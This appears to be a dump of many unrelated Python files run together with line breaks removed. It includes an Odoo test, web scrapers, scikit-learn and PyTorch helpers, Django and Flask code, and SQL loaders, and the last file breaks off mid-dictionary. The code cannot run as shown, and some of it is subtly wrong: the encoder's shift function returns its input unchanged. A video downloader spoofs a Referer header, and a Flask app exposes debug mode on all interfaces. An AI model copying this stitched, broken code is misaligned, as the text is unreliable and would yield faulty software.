# -- encoding: utf-8 -- from odoo.addons.account.tests.account_test_savepoint import AccountTestInvoicingCommon from odoo import fields from odoo.tests import tagged from odoo.tests.common import Form @tagged('post_install', '-at_install') class TestBillsPrediction(AccountTestInvoicingCommon): @classmethod def setUpClass(cls, chart_template_ref=None): super().setUpClass(chart_template_ref=chart_template_ref) cls.test_partners = cls.env['res.partner'].create([{'name': 'test partner %s' % i} for i in range(7)]) expense_type = cls.env.ref('account.data_account_type_expenses') cls.test_accounts = cls.env['account.account'].create({ 'code': 'test%s' % i, 'name': name, 'user_type_id': expense_type.id, 'company_id': cls.company_data['company'].id, } for i, name in enumerate(( "Test Maintenance and Repair", "Test Purchase of services, studies and preparatory work", "Test Various Contributions", "Test Rental Charges", "Test Purchase of commodity", ))) cls.frozen_today = fields.Date.today() def _create_bill(self, vendor, line_name, expected_account, account_to_set=None): ''' Create a new vendor bill to test the prediction. :param vendor: The vendor to set on the invoice. :param line_name: The name of the invoice line that will be used to predict. :param expected_account: The expected predicted account. :param account_to_set: The optional account to set as a correction of the predicted account. :return: The newly created vendor bill. ''' invoice_form = Form(self.env['account.move'].with_context(default_type='in_invoice')) invoice_form.partner_id = vendor invoice_form.invoice_date = self.frozen_today with invoice_form.invoice_line_ids.new() as invoice_line_form: # Set the default account to avoid "account_id is a required field" in case of bad configuration. invoice_line_form.account_id = self.company_data['default_journal_purchase'].default_credit_account_id invoice_line_form.quantity = 1.0 invoice_line_form.price_unit = 42.0 invoice_line_form.name = line_name invoice = invoice_form.save() invoice_line = invoice.invoice_line_ids self.assertEqual( invoice_line.account_id, expected_account, "Account '%s' should have been predicted instead of '%s'" % ( expected_account.display_name, invoice_line.account_id.display_name, ), ) if account_to_set: invoice_line.account_id = account_to_set invoice.post() return invoice def test_account_prediction_flow(self): default_account = self.company_data['default_journal_purchase'].default_debit_account_id self._create_bill(self.test_partners[0], "Maintenance and repair", self.test_accounts[0]) self._create_bill(self.test_partners[5], "Subsidies obtained", default_account, account_to_set=self.test_accounts[1]) self._create_bill(self.test_partners[6], "Prepare subsidies file", self.test_accounts[1]) self._create_bill(self.test_partners[1], "Contributions January", self.test_accounts[2]) self._create_bill(self.test_partners[2], "Coca-cola", default_account, account_to_set=self.test_accounts[4]) self._create_bill(self.test_partners[1], "Contribution February", self.test_accounts[2]) self._create_bill(self.test_partners[3], "Electricity Bruxelles", default_account, account_to_set=self.test_accounts[3]) self._create_bill(self.test_partners[3], "Electricity Grand-Rosière", self.test_accounts[3]) self._create_bill(self.test_partners[2], "Purchase of coca-cola", self.test_accounts[4]) self._create_bill(self.test_partners[4], "Crate of coca-cola", self.test_accounts[4]) self._create_bill(self.test_partners[1], "March", self.test_accounts[2]) def test_account_prediction_with_product(self): product = self.env['product.product'].create({ 'name': 'product_a', 'lst_price': 1000.0, 'standard_price': 800.0, 'property_account_income_id': self.company_data['default_account_revenue'].id, 'property_account_expense_id': self.company_data['default_account_expense'].id, }) invoice_form = Form(self.env['account.move'].with_context(default_type='in_invoice')) invoice_form.partner_id = self.test_partners[0] invoice_form.invoice_date = self.frozen_today with invoice_form.invoice_line_ids.new() as invoice_line_form: invoice_line_form.product_id = product invoice_line_form.name = "Maintenance and repair" invoice = invoice_form.save() self.assertRecordValues(invoice.invoice_line_ids, [{ 'name': "Maintenance and repair", 'product_id': product.id, 'account_id': self.company_data['default_account_expense'].id, }])
# @Time : 2018/3/7 16:15 # @Author : Jing Xu import threading import requests from bs4 import BeautifulSoup def gettitle(page): url = "https://movie.douban.com/top250?start={}&filter=".format(page * 25) r = requests.get(url) soup = BeautifulSoup(r.content, "html.parser") lis = soup.find("ol", class_="grid_view").find_all("li") print(threading.current_thread()) for li in lis: title = li.find("span", class_="title").text print(title) class MyThread(threading.Thread): def __init__(self, target, args): threading.Thread.__init__(self) self.target = target self.args = args def run(self): self.target(self.args) for i in range(10): th = MyThread(gettitle, page=i) th.start()
import numpy as np import pandas as pd # pip install pandas from sklearn.naive_bayes import GaussianNB # pip install sklearn from sklearn.neighbors import KNeighborsClassifier from sklearn import svm from sklearn import tree # from sklearn.model_selection.cross_validation import cross_val_predict from sklearn.model_selection import train_test_split from sklearn.metrics import confusion_matrix from matplotlib import pyplot as plt from matplotlib.ticker import NullFormatter from matplotlib import gridspec def niave_gaussian_probabilities(inputs_test, inputs_train, lbl_np1d_train): """Trains a niave gaussian model. Args: inputs_test (np.array): Training dataset inputs_train (np.array): Training dataset lbl_np1d_train (np.array): Training labels Returns: all_probs (np.array): Estimated probabilites of each sample for each class, shape (n_samples, n_classes) model: Trained model """ gnb = GaussianNB() model = gnb.fit(inputs_train, lbl_np1d_train) all_probs = model.predict_proba(inputs_test) return all_probs, model def knn_probabilities(inputs_test, inputs_train, lbl_np1d_train, k): """Trains a KNN model. Args: inputs_test (np.array): Testing dataset inputs_train (np.array): Training dataset lbl_np1d_train (np.array): Training labels k (uint): Number of neighbors Returns: all_probs (np.array): Estimated probabilites of each sample for each class, shape (n_samples, n_classes) model Trained model """ ############################### ########## FILL IN ############ ############################### knn = KNeighborsClassifier(n_neighbors=k) model = knn.fit(inputs_train, lbl_np1d_train) all_probs = model.predict_proba(inputs_test) ############################### return all_probs, model def dt_probabilities(inputs_test, inputs_train, lbl_np1d_train, maxDepth=None): """Trains a decision tree model. Args: inputs_test (np.array): Testing dataset inputs_train (np.array): Training dataset lbl_np1d_train (np.array): Training labels Returns: all_probs (np.array): Estimated probabilites of each sample for each class, shape (n_samples, n_classes) model Trained model """ dt = tree.DecisionTreeClassifier(max_depth=maxDepth) model = dt.fit(inputs_train, lbl_np1d_train) all_probs = model.predict_proba(inputs_test) return all_probs, model def get_training_data(lbl_np1d, full_input_data): """Creates training and testing datasets from input image and mask. Args: lbl_np1d (np.array): mask of desired training data full_input_data (np.array): all of the image data Returns: full_input_data (np.array): testing data train_subset (np.array): training data """ train_subset = full_input_data[lbl_np1d > 0] # full_input_data[lbl_np1d < 1] = 0 # Set AIR to code 0 return full_input_data, train_subset def create_train_test_arrays(feature_images): """Combines all features to create train and test datasets. Args: feature_images (list): Each list element is tuple of np.arrys for training and testing data for 1 feature Returns: inputs_test (np.array): Testing dataset inputs_train (np.array): Training dataset """ test_set = list() train_set = list() for tup in feature_images: test_set.append(tup[0].T) train_set.append(tup[1].T) inputs_test = np.dstack(tuple(test_set)) # remove 0 dimension inputs_test.shape = (inputs_test.shape[1], inputs_test.shape[2]) inputs_train = np.dstack(tuple(train_set)) # remove 0 dimension inputs_train.shape = (inputs_train.shape[1], inputs_train.shape[2]) return inputs_test, inputs_train def plot_decision_boundary(model, feat1_np1d, feat2_np1d, label_np1d, class_labels): """Plots the decision boundary for the classifier Args: model : A trained model using sklearn modules feat1_np1d (np.array) : training data, first feaure feat2_np1d (np.array) : training data, second feature label_np1d (np.array) : training data labels """ fig = plt.figure(figsize=(10, 20)) gs = gridspec.GridSpec(3, 1) gs.update(wspace=0.1, hspace=0.1) # create grid of entire feature space x_min, x_max = feat1_np1d.min() - 1, feat1_np1d.max() + 1 y_min, y_max = feat2_np1d.min() - 1, feat2_np1d.max() + 1 xx, yy = np.meshgrid(np.arange(x_min, x_max, 1), np.arange(y_min, y_max, 1)) Z = model.predict_proba(np.c_[xx.ravel(), yy.ravel()]) # class label colors for scatter points colors = {'WM': 'w', 'GM': 'c', 'CSF': 'k'} labels = ['WM', 'GM', 'CSF'] # plot probability map over feature space for each class for ind, label in enumerate(labels): ax = plt.subplot(gs[ind]) pred = Z[:, ind] pred = pred.reshape(xx.shape) # plot probability contours v = np.linspace(0.0, 1.0, 7, endpoint=True) cont = ax.contourf(xx, yy, pred, v, cmap=plt.cm.RdBu, alpha=0.6) ax.contour(xx, yy, pred, levels=[0.5], colors='black') # plot points for each class for ind2, label2 in enumerate(labels): xc = [val for i, val in enumerate(feat1_np1d) if label_np1d[i] == class_labels[label2]] yc = [val for i, val in enumerate(feat2_np1d) if label_np1d[i] == class_labels[label2]] cols = colors[label2] * len(xc) ax.scatter(xc, yc, c=cols, label=label2) ax.set_title(label + ' Probability') ax.set_xlabel('T1') ax.set_ylabel('T2') ax.legend() fig.colorbar(cont, shrink=0.9, ticks=v) plt.show() def get_random_sample(feat1_np1d, feat2_np1d, label_np1d, LABELS, num_per_class=100): """ """ feat1 = [] feat2 = [] feat1_train = np.array([]) feat2_train = np.array([]) label_train = np.array([]) for label in LABELS: value = LABELS[label] feat1 = feat1_np1d[label_np1d == value] feat2 = feat2_np1d[label_np1d == value] ind = [x for x in range(0, feat1.shape[0])] np.random.shuffle(ind) ind_sub = ind[0:num_per_class] feat1_train = np.hstack((feat1_train, feat1[ind_sub])) feat2_train = np.hstack((feat2_train, feat2[ind_sub])) label_train = np.hstack((label_train, value * np.ones(num_per_class))) train = np.column_stack((feat1_train, feat2_train)) return train, label_train def get_accuracy(pred, lbl): """ Compute the accuracy of the values based on the machine learning model """ correct = sum((np.logical_and(pred == lbl, lbl > 0)).astype(int)) total = sum((lbl > 0).astype(int)) return float(correct) / total
import argparse import os from model_temp import Temp_RFRNetModel from dataset_temp import Tem_Dataset from torch.utils.data import DataLoader def run(): parser = argparse.ArgumentParser() #训练数据的位置 parser.add_argument('--data_root', type=str, default='/home/yaoziqiang/py_project/train&test_data/train_mavg') parser.add_argument('--mask_root', type=str, default='/home/yaoziqiang/py_project/mask_level/70_360') ################# 测试数据路径######################### # data parser.add_argument('--test_data', type=str, default='/home/yaoziqiang/climate_data/station_data/test_data/data') #/home/yaoziqiang/py_project/train&test_data/test_mavg #/home/yaoziqiang/climate_data/station_data/test_data/data # mask parser.add_argument('--test_mask', type=str, default='/home/yaoziqiang/climate_data/station_data/test_data/mask') #/home/yaoziqiang/py_project/mask_level/70 #/home/yaoziqiang/climate_data/station_data/test_data/mask ##################################################### #模型保存位置 parser.add_argument('--model_save_path', type=str, default='/home/yaoziqiang/py_project/RFR/results/mask70/bavg_ckpt') #测试结果保存位置 parser.add_argument('--result_save_path', type=str, default='/home/yaoziqiang/py_project/RFR/results/mask70/station_data') parser.add_argument('--num_iters', type=int, default=80001)#训练迭代次数450000 #训练时的模型位置 parser.add_argument('--model_path', type=str, default="/home/yaoziqiang/py_project/RFR/results/mask70/bavg_ckpt/(new)temp_70_76000ft.pth")#可能要改 #测试时的模型位置 parser.add_argument('--test_model_path', type=str,default="/home/yaoziqiang/py_project/RFR/results/mask70/bavg_ckpt/") # 可能要改 #/home/yaoziqiang/py_project/RFR/results/mask70/mdata_ckpt/ parser.add_argument('--batch_size', type=int, default=60) parser.add_argument('--n_threads', type=int, default=0) parser.add_argument('--finetune', action='store_true') parser.add_argument('--test', action='store_true') parser.add_argument('--gpu_id', type=str, default="0") args = parser.parse_args() os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_id#指定要使用的GPU model = Temp_RFRNetModel() if args.test: dataloader = DataLoader( Tem_Dataset(args.test_data, args.test_mask,training=False))#默认不打乱数据 #测试某个模型 model.initialize_model(args.test_model_path + '(new)temp_70_80000.pth', False) model.cuda() model.test(dataloader, args.result_save_path, 80000) print('{:d}th model was tested'.format(80000)) for i in range(76000, 162000, 2000): model.initialize_model(args.test_model_path+'temp_70_{:d}ft.pth'.format(i), False) model.cuda() model.test(dataloader, args.result_save_path, i) print('{:d}th model was tested'.format(i)) for j in range(76000, 162000, 2000): path = './rmse_70/b254_rmse_70({:d})ft.txt'.format(j) f = open(path,'r') sum = 0.0 for line in f.readlines(): sum += float(line[10:16])# avg = sum/120 avgrmse_path = './avg_b254_70ft.txt' f_w = open(avgrmse_path, 'a+') f_w.write('avgrmse:' + str(avg) + '\r\n') else: model.initialize_model(args.model_path, True) model.cuda() #打开训练数据，并加载如dataloader dataloader = DataLoader(Tem_Dataset(args.data_root, args.mask_root), batch_size = args.batch_size, shuffle = True, num_workers = args.n_threads) model.train(dataloader, args.model_save_path, args.finetune, args.num_iters) if __name__ == '__main__': run()
class NumMatrix(object): def __init__(self, matrix): row_num = len(matrix) col_num = len(matrix[0]) if row_num > 0 else 0 m = [[0 for i in range(col_num + 1)] for j in range(row_num + 1)] for i in range(1, row_num + 1): for j in range(1, col_num + 1): m[i][j] = m[i-1][j] + m[i][j-1] - m[i-1][j-1] + matrix[i-1][j-1] self.m = m def sumRegion(self, row1, col1, row2, col2): x1 = row1 + 1 x2 = row2 + 1 y1 = col1 + 1 y2 = col2 + 1 m = self.m return m[x2][y2] + m[x1-1][y1-1] - m[x2][y1-1] - m[x1-1][y2]
""" 자연수 A, B가 주어지면 A+B를 구하는 프로그램을 작성하시오. 입력 자연수 A, B (0 < A, B ≤ 10)가 첫 번째 줄에 주어진다. 단, 두 수의 사이에는 공백이 주어지지 않는다. 두 수의 앞에 불필요한 0이 붙는 경우는 없다. 출력 첫 번째 줄에 A+B의 값을 출력한다. 예제 입력 1 37 예제 출력 1 10 """ s=input() r=0 for i in range(0, len(s)): if int(s[i]) == 0: r += 9 r += int(s[i]) print(r)
#is 练习：判断二个变量是否为同一个对象，是否指向同一个内存地址 stu_list=['王利利',24,88888.88] print(id(stu_list)) #地址传递 stu2_list=stu_list print(id(stu2_list)) #is 运算 if stu_list is stu2_list: print('A is B') else : print('A is not B') #值传递，再开辟一个空间存放数据 c=stu_list[:] #切片没头没尾就是全部复制 print(id(c)) #查看内存地址 if c is stu_list: print( 'C is A') else: print('C is not A') # 看代码猜结果 stu_list[0]='王小利' print(stu_list[0]) print(stu2_list[0]) print(c[0])
''' author: juzicode address: www.juzicode.com 公众号: 桔子code/juzicode date: 2020.8.1 ''' print('\n') print('-----欢迎来到www.juzicode.com') print('-----公众号: 桔子code/juzicode \n') from ctypes import * class TuTest(Union): #定义ctypes类型的“结构体” _fields_ = [('a', c_char), ('b', c_int), ('c', c_longlong) ] test = TuTest( b'a',100,200) #初始化 print('a:',test.a) #使用成员变量 print('b:',test.b) print('c:',test.c) pyt = CDLL('pytest.dll') #加载dll pyt.trans_union.restype=c_int #声明返回参数类型和入参类型 pyt.trans_union.argtypes=(TuTest,) pyt.trans_union(test) #调用
from django.contrib.auth.mixins import LoginRequiredMixin from django.views.generic import ListView, CreateView, UpdateView, TemplateView from django.contrib.auth import login, authenticate from django.shortcuts import render, redirect from django.urls import reverse_lazy from functools import wraps from chartjs.views.lines import BaseLineChartView from django.http import HttpResponse,HttpResponseRedirect, JsonResponse import json from django.core.serializers.json import DjangoJSONEncoder from django.core import serializers from django.core.serializers import serialize from apps.usuarios.forms import SignUpForm from apps.usuarios.models import User from apps.cuentas.models import Cuenta from apps.presupuestos.models import * def signup(request): if request.method == 'POST': form = SignUpForm(request.POST) if form.is_valid(): user= form.save(commit=False) username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('password1') user.es_cliente =True user.save() user = authenticate(username=username, password=raw_password) login(request, user) return redirect('cuentas:listado_de_cuentas') else: form = SignUpForm() return render(request, 'usuarios/signup.html', {'form': form}) def Inicio(request): cuentas = request.user.cuentas_del_usuario.filter(estado='Activa') presupuestos = request.user.presupuestos_del_usuario.filter(estado="Activo")#mes__month=3 contexto = {'cuentas':cuentas,'presupuestos':presupuestos} print("inicio") print(contexto) return render(request,'usuarios/inicio.html', {'cuentas':cuentas,'presupuestos':presupuestos}) def presupuestos_serialize(presupuesto): categorias = presupuesto.categorias_del_presupuesto.all() categorias = [ {'categoria_nombre': categoria.nombre, 'categoria_planeado': categoria.planeado, 'categoria_actual':categoria.actual} for categoria in categorias] return {'id':presupuesto.id,'nombre':presupuesto.nombre, 'total_planeado':presupuesto.total_planeado, 'total_actual':presupuesto.total_actual, 'categorias':categorias} def getGraficPie(request): presupuestos = request.user.presupuestos_del_usuario.filter(estado="Activo") presupuestos = [ presupuestos_serialize(presupuesto) for presupuesto in presupuestos ] return HttpResponse(json.dumps(presupuestos,cls=DjangoJSONEncoder), content_type = "application/json") def getCuentas(request): cuentas = request.user.cuentas_del_usuario.filter(estado='Activa') cuentas = [ {'cuenta_id':cuenta.id} for cuenta in cuentas ] return HttpResponse(json.dumps(cuentas,cls=DjangoJSONEncoder), content_type = "application/json") class CuentasSaldo(BaseLineChartView): def get_labels(self): nombres_cuentas = list(Cuenta.objects.filter(usuario=1).values_list("nombre", flat=True)) return nombres_cuentas def get_providers(self): return [" NOTHING "] def get_data(self): cuentas = Cuenta.objects.all() saldo_cuentas = [] for cuenta in cuentas: saldo_cuenta = cuenta.saldo saldo_cuentas.append(saldo_cuenta) return [saldo_cuentas] vista_cuentas_y_saldo = TemplateView.as_view(template_name='usuarios/inicio.html') cuentas_y_saldo_json = CuentasSaldo.as_view()
# Generated by Django 2.1.2 on 2019-05-02 14:56 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('scheduler', '0027_request_path'), ] operations = [ migrations.AlterField( model_name='request', name='date_time', field=models.CharField(default='', max_length=128, unique=True), ), ]
# -- coding: utf-8 -- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('course_selection', '0006_auto_20141124_1441'), ] operations = [ migrations.AlterField( model_name='semester', name='term_code', field=models.CharField(default=1152, unique=True, max_length=4, db_index=True), preserve_default=True, ), ]
from django.contrib import admin from detectdata.models import * # Register your models here. admin.site.register(Detect)
from flask import Flask, jsonify import time from stats_helper import StatsHelper from flask_cors import CORS import simplejson as json # instead of import json app = Flask(__name__) CORS(app) stats_helper = StatsHelper() #Used to bring in employee table information # @app.route('/') # def home(): # return json.dumps(stats_helper.select_all_employee) # #Used bring in stats # @app.route('/Total_Exercise_Hours') # def exercies_hours_total(): @app.route('/') def homepage(): return json.dumps(stats_helper.select_all()) #@app.route('/employee') #def employee(): #return json.dumps(stats_helper.select_all_employee()) @app.route('/calcExercise') def calcExercise(): return json.dumps(stats_helper.calculate_total_exercise()) @app.route('/highestMonth') def highestMonth(): return json.dumps(stats_helper.highest_month()) @app.route('/totalStaff') def totalStaff(): return json.dumps(stats_helper.totalStaff()) @app.route('/avgEmployeeAge') def avgEmployeeAge(): return json.dumps(stats_helper.avgEmployeeAge()) @app.route('/alldata') def alldata(): return json.dumps(stats_helper.join_all()) print("### Application started...") if __name__ == '__main__': app.run(debug=True, host='0.0.0.0')
#!/usr/bin/env python """ _LoadForErrHandler_ MySQL implementation of Jobs.LoadForErrorHandler. """ from WMCore.Database.DBFormatter import DBFormatter from WMCore.WMBS.File import File from WMCore.DataStructs.Run import Run class LoadForErrorHandler(DBFormatter): """ _LoadForErrorHandler_ Retrieve meta data for a job given it's ID. This includes the name, job group and last update time. It also works for the AccountantWorker to determine ACDC records for skipped files in successful jobs, this mode is used when a file selection is provided. """ sql = """SELECT wmbs_job.id, jobgroup, wmbs_job.name AS name, wmbs_job_state.name AS state, state_time, retry_count, couch_record, cache_dir, wmbs_location.site_name AS location, outcome AS bool_outcome, fwjr_path AS fwjr_path, ww.name as workflow, ww.task as task, ww.spec as spec, wmbs_users.owner as owner, wmbs_users.grp as grp FROM wmbs_job INNER JOIN wmbs_jobgroup ON wmbs_jobgroup.id = wmbs_job.jobgroup INNER JOIN wmbs_subscription ON wmbs_subscription.id = wmbs_jobgroup.subscription INNER JOIN wmbs_workflow ww ON ww.id = wmbs_subscription.workflow INNER JOIN wmbs_users ON ww.owner = wmbs_users.id LEFT OUTER JOIN wmbs_location ON wmbs_job.location = wmbs_location.id LEFT OUTER JOIN wmbs_job_state ON wmbs_job.state = wmbs_job_state.id WHERE wmbs_job.id = :jobid""" fileSQL = """SELECT wfd.id, wfd.lfn, wfd.filesize size, wfd.events, wfd.first_event, wfd.merged, wja.job jobid, wls.pnn pnn FROM wmbs_file_details wfd INNER JOIN wmbs_job_assoc wja ON wja.fileid = wfd.id INNER JOIN wmbs_file_location wfl ON wfl.fileid = wfd.id INNER JOIN wmbs_location wl ON wl.id = wfl.location INNER JOIN wmbs_location_pnns wls ON wls.location = wfl.location WHERE wja.job = :jobid""" parentSQL = """SELECT parent.lfn AS lfn, wfp.child AS id FROM wmbs_file_parent wfp INNER JOIN wmbs_file_details parent ON parent.id = wfp.parent WHERE wfp.child = :fileid """ runLumiSQL = """SELECT fileid, run, lumi FROM wmbs_file_runlumi_map WHERE fileid = :fileid""" def formatJobs(self, result): """ _formatJobs_ Cast the id, jobgroup and last_update columns to integers because formatDict() turns everything into strings. """ formattedResult = DBFormatter.formatDict(self, result) for entry in formattedResult: if entry["bool_outcome"] == 0: entry["outcome"] = "failure" else: entry["outcome"] = "success" del entry["bool_outcome"] entry['group'] = entry['grp'] entry['input_files'] = [] return formattedResult def execute(self, jobID, fileSelection = None, conn = None, transaction = False): """ _execute_ Execute the SQL for the given job ID and then format and return the result. """ if type(jobID) == list: if len(jobID) < 1: # Nothing to do return [] binds = jobID else: binds = {"jobid": jobID} result = self.dbi.processData(self.sql, binds, conn = conn, transaction = transaction) jobList = self.formatJobs(result) filesResult = self.dbi.processData(self.fileSQL, binds, conn = conn, transaction = transaction) fileList = self.formatDict(filesResult) fileBinds = [] if fileSelection: fileList = filter(lambda x : x['lfn'] in fileSelection[x['jobid']], fileList) for x in fileList: # Add new runs x['newRuns'] = [] # Assemble unique list of binds if not {'fileid': x['id']} in fileBinds: fileBinds.append({'fileid': x['id']}) parentList = [] if len(fileBinds) > 0: parentResult = self.dbi.processData(self.parentSQL, fileBinds, conn = conn, transaction = transaction) parentList = self.formatDict(parentResult) lumiResult = self.dbi.processData(self.runLumiSQL, fileBinds, conn = conn, transaction = transaction) lumiList = self.formatDict(lumiResult) lumiDict = {} for l in lumiList: if not l['fileid'] in lumiDict.keys(): lumiDict[l['fileid']] = [] lumiDict[l['fileid']].append(l) for f in fileList: fileRuns = {} if f['id'] in lumiDict.keys(): for l in lumiDict[f['id']]: run = l['run'] lumi = l['lumi'] try: fileRuns[run].append(lumi) except KeyError: fileRuns[run] = [] fileRuns[run].append(lumi) for r in fileRuns.keys(): newRun = Run(runNumber = r) newRun.lumis = fileRuns[r] f['newRuns'].append(newRun) filesForJobs = {} for f in fileList: jobid = f['jobid'] if not jobid in filesForJobs.keys(): filesForJobs[jobid] = {} if f['id'] not in filesForJobs[jobid].keys(): wmbsFile = File(id = f['id']) wmbsFile.update(f) wmbsFile['locations'].add(f['pnn']) for r in wmbsFile['newRuns']: wmbsFile.addRun(r) for entry in parentList: if entry['id'] == f['id']: wmbsFile['parents'].add(entry['lfn']) filesForJobs[jobid][f['id']] = wmbsFile else: # If the file is there, just add the location filesForJobs[jobid][f['id']]['locations'].add(f['pnn']) for j in jobList: if j['id'] in filesForJobs.keys(): j['input_files'] = filesForJobs[j['id']].values() return jobList
import random import string # randCharList = list(string.ascii_lowercase) + (list(string.ascii_uppercase)) randCharList = list("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$%&'()+,-./:;<=>?@[\]^_`{\|}~") def encode(msg): # randCharList = list(string.ascii_lowercase) + (list(string.ascii_uppercase)) # randCharList = list("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$%&'()+,-./:;<=>?@[\]^_`{\|}~") #amount of fake letters changes every time encodeLength = random.randrange(3,7) #letter changes evry time encodeChar = random.choice(randCharList) encodedMsg = "" for i in range(len(msg)): fakeLetterCount = 0 #different spot for encodedChar each time encodeCharSpot = random.randrange(1, encodeLength - 1) while fakeLetterCount < encodeLength: if fakeLetterCount == encodeCharSpot and encodeChar != msg[i]: encodedMsg += encodeChar else: fakeLetter = random.choice(randCharList) while fakeLetter == encodeChar: fakeLetter = random.choice(randCharList) encodedMsg += fakeLetter fakeLetterCount += 1 encodedMsg += msg[i] return encodedMsg, encodeChar def shiftCode(encodedMsg): shiftLength = random.randrange(0,10) newEncodedMsg = "" for i in range(len(encodedMsg)): currentIndex = randCharList.index(encodedMsg[i]) shiftedIndex = currentIndex + shiftLength newIndex = shiftedIndex % len(randCharList) newEncodedMsg+=randCharList[newIndex] return encodedMsg, shiftLength def main(): encodedMsg = "" efile = open("msg.txt", 'r') for line in efile: encodedMsg += line efile.close() levels = int(input("how many levels of encoding? ")) key = "" for i in range(levels): encodedMsg, secretChar = encode(encodedMsg) key+=secretChar encodedMsg, secretShift = shiftCode(encodedMsg) key+=str(secretShift) print("\n%s" % encodedMsg) print("\nkey: %s\n" % key) efile = open("encodedMsg.txt", 'w') efile.write(encodedMsg) efile.close() main()
""" @author:ming @file:梨视频下载.py @time:2021/10/26 """ import requests # https://www.pearvideo.com/video_1744464 页面链接 # https://video.pearvideo.com/mp4/adshort/20211025/cont-1744464-15787050_adpkg-ad_hd.mp4 播放链接 # https://video.pearvideo.com/mp4/adshort/20211025/1635257300512-15787050_adpkg-ad_hd.mp4 后端返回链接，加密处理过 # 页面 cont_id = "1744193" page_url = f"https://www.pearvideo.com/video_{cont_id}" video_status_url = f"https://www.pearvideo.com/videoStatus.jsp?contId={cont_id}&mrd=0.5267971241406777" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36", # 防盗链，访问当前链接的页面地址 "Referer": page_url } video_status_resp = requests.get(video_status_url, headers=headers) video_status_resp.close() video_status = video_status_resp.json() # 响应的系统时间 system_time = video_status["systemTime"] # 响应的加密播放链接 src_url = video_status["videoInfo"]["videos"]["srcUrl"] # 解密 download_url = src_url.replace(system_time, "cont-" + cont_id) # 下载 print(download_url) source_resp = requests.get(download_url, headers=headers) with open("videos/" + cont_id + ".mp4", mode="wb") as video_file: video_file.write(source_resp.content) source_resp.close() print("下载完成")
f = open('rosalind_ini3.txt', 'r') strings = f.readlines() f.close() marker = strings[1] a,b,c,d = [int(i) for i in marker.split(' ')] sequence = strings[0] print '{0} {1}'.format(sequence[a:b+1], sequence[c:d+1])
import matplotlib.mlab as mlab import matplotlib.pyplot as plt plt.figure(figsize=[6,3]) # plt.rcParams['figure.dpi'] = 200 #分辨率 # the histogram of the data plt.hist(df['Normalized Score'],bins=50,color='lightgray',edgecolor='black',alpha=0.75) plt.ylabel('Requests') plt.axis([-3, 3, 0, 300]) plt.grid(True,linestyle='--',color='gray') plt.show()
''' Created on Dec 22, 2014 @author: desposito ''' from Ingredient import Ingredient class Malt(Ingredient): ''' classdocs ''' def __init__(self, name, quantity, ppg, srm): ''' Constructor ''' Ingredient.__init__(self, name, quantity, "lbs", ppg=ppg, srm=srm) self.ppg = self.params["ppg"] self.srm = self.params["srm"] self.grist = 0.0
import re import pandas as pd from os.path import dirname,abspath import sys sys.path.append(dirname(dirname(abspath(__file__)))) from os.path import join as pjoin from sklearn.utils import shuffle import cv2 import numpy as np import torch from torch.utils.data import Dataset, DataLoader import xml.etree.ElementTree as ET import torchvision.transforms as transforms # 得到图片路径、label路径、label名称 def make_list(): path = 'D:\Python\CV\week12\week10_dataset\\0_annotation_train.txt' # 标注文件，含有图片名称、label、地址等信息 file = open(path,encoding='utf-8') source = file.read() label_path =[] # 存放label的路径 label_name = [] # 存放label名称 image_path = [] # 存放图片的路径 images = [] # 存放解析出来的含有图片路径的信息（文件夹名称和图片名称） LABEL_ROOT = 'D:\Python\CV\week12\\anjiang2020_admin-week10-dataset-master\week10-dataset\cvf-week11-datasets-all-labled\\annotation\V006\\annotations' IMAGE_ROOT = 'D:\Python\CV\week12\week10_dataset' for line in source.split("\n"): label = re.findall('"name":"(\w+)"', line) label_name.append(label) image = re.findall('image/(\w+)/(\w+)', line) images.append(image) for i in images: for j in i: a,b=j # a:文件夹名称 b:图片名称 image_adr = IMAGE_ROOT+ '\\' + a + '\\' + b +'.jpg' image_path.append(image_adr) label_adr = LABEL_ROOT+'\\' + a + '\\' + b +'.xml' label_path.append(label_adr) label_name.pop(-1) # 最后一个为空 df = pd.DataFrame({'image':image_path,'label':label_path,'class':label_name})#将图片路径，label路径和label名称写入csv文件 df = shuffle(df) # 乱序 df.to_csv(pjoin(IMAGE_ROOT,'Train.csv'),index=False,encoding='utf-8_sig')#保存文件 print('Train.csv saved') print(len(image_path),len(label_path),len(label_name)) return image_path,label_path,label_name # 虽然存放在不同列表中，但都是一一对应的 # 得到图片bbox的坐标信息（左上角坐标x1y1和右下角坐标x2y2） def get_bbox(label_list,image_list): bboxes = [] # 存放所有label的bbox坐标信息 # i = 0 for xml_file,image_file in zip( label_list,image_list): # 同时拿出一张图片的路径和对应label路径（图片路径和label路径是生成时对应好的） # i +=1 cv_img = cv2.imdecode(np.fromfile(image_file, dtype=np.uint8), -1) # 读取图像，解决imread不能读取中文路径的问题 h,w,c = cv_img.shape object = [] # 存放一张图片中的bbox坐标信息，可能有多个bbox tree = ET.parse(xml_file) # 解析读取xml函数 filename,_ = tree.find('filename').text.split('.') for size in tree.findall('size'): width = int(size.find('width').text) height = int(size.find('height').text) for obj in tree.findall('object'): bbox = obj.find('bndbox') obj_struct = [w * int(bbox.find('xmin').text) / width, # 列表形式存放一个bbox坐标信息 h * int(bbox.find('ymin').text) / height, w * int(bbox.find('xmax').text) / width, h * int(bbox.find('ymax').text) / height] object.append(obj_struct) # print(object[0]) # draw_img_rects(cv_img, object,i) bboxes.append(object) return bboxes # 与图片路径等信息也是一一对应的 # 在图片中画出bbox def draw_img_rects(image, object,i): # for bbox in object: bbox = object[0] xmin, ymin, xmax, ymax = bbox w = xmax - xmin h = ymax - ymin cv2.rectangle(image, (int(xmin), int(ymin)), (int(xmin) + int(w), int(ymin) + int(h)), (0, 255, 0), 10) # 在图片中画矩形框 cv2.namedWindow('img', cv2.WINDOW_NORMAL) cv2.imshow('img', image) cv2.imwrite('image/'+str(i)+'.jpg',image) cv2.waitKey(10) # 持续时长 # 将label名称对应到0~13个数字上 def make_label(label_name): classifier = {'百岁山':1,'怡宝':2,'百事可乐':3,'景甜':4,'娃哈哈':5,'康师傅':6,'苏打水':7, 